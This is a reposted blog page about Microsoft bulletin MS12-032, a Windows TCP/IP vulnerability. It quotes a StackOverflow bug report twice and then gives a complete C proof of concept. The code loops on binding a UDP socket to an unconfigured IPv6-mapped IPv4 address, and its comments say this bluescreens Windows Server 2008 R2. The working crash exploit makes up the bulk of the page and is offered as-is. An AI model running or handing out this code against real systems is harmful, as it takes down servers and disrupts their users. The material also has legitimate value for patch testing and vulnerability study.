MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
2012-05-10 09:51
267 查看
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped
invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
from :
http://security-sh3ll.blogspot.com/2012/05/ms12-032-vulnerability-in-tcpip-could.html
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped
invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
from :
http://security-sh3ll.blogspot.com/2012/05/ms12-032-vulnerability-in-tcpip-could.html
// the program attempts to bind to IPV6-mapped IPV4 address // in a tight loop. If the address is not configured on the machine // running the program crashes Windows Server 2008 R2 (if program is 32-bit) #include #include #include #include #define IPV6_V6ONLY 27 void MyWsaStartup() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(2, 2); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) { printf("WSAStartup failed with error: %d\n", err); exit(-1); } } void main() { MyWsaStartup(); bool bindSuccess = false; while(!bindSuccess) { SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); if(sock == INVALID_SOCKET) { printf("WSASocket failed\n"); exit(-1); } DWORD val = 0; if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (const char*)&val, sizeof(val)) != 0) { printf("setsockopt failed\n"); closesocket(sock); exit(-1); } sockaddr_in6 sockAddr; memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.sin6_family = AF_INET6; sockAddr.sin6_port = htons(5060); // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine) // that is [::FFFF:169.13.13.13] sockAddr.sin6_addr.u.Byte[15] = 13; sockAddr.sin6_addr.u.Byte[14] = 13; sockAddr.sin6_addr.u.Byte[13] = 13; sockAddr.sin6_addr.u.Byte[12] = 169; sockAddr.sin6_addr.u.Byte[11] = 0xFF; sockAddr.sin6_addr.u.Byte[10] = 0xFF; int size = 28; // 28 is sizeof(sockaddr_in6) int nRet = bind(sock, (sockaddr*)&sockAddr, size); if(nRet == SOCKET_ERROR) { closesocket(sock); Sleep(100); } else { bindSuccess = true; printf("bind succeeded\n"); closesocket(sock); } } }
相关文章推荐
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- Increasing the maximum number of tcp/ip connections in linux
- tcpip数据包编码解析(chunk and gzip)_space of Jialy_百度空间
- CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptiv
- Could not find a price list in Ordered UOM xxx and Primary UOM of the item
- msfconsole run error – Could not find rake-10.4.2 in any of the sources
- IP address could not be resolved: Temporary failure in name resolution
- EOP / Office 365: Block or Allow IP Address in Connection Filtering
- 安装Oracle 11gR2,报错:[INS-06101] IP address of localhost could not be determined
- Programming TCP/IP Windows Sockets in C++
- File /hbase could only be replicated to 0 nodes instead of minReplication (=1). There are 30 datanode(s) running and no node(s) are excluded in this operation.
- TCP/IP Socket Communications in MATLAB example
- bundle install时候出现"Could not find modernizr-2.6.2 in any of the sources"
- Could not find gem 'sass-rails (~> 5.0) x64-mingw32' in any of the gem sources listed in your Gemfil
- Could not find a price list in Ordered UOM xxx and Primary UOM of the item
- IP address of localhost could not be determined 解决方法
- Error: Could not find an installed version of Gradle either in Android Studio
- A Comparison of the OSI and TCP/IP Reference Models
- Error:Could not get unknown property ‘apkVariantData’ for object of type com.android.build.gradle.in
- CordovaError: Could not find an installed version of Gradle either in Android Studio,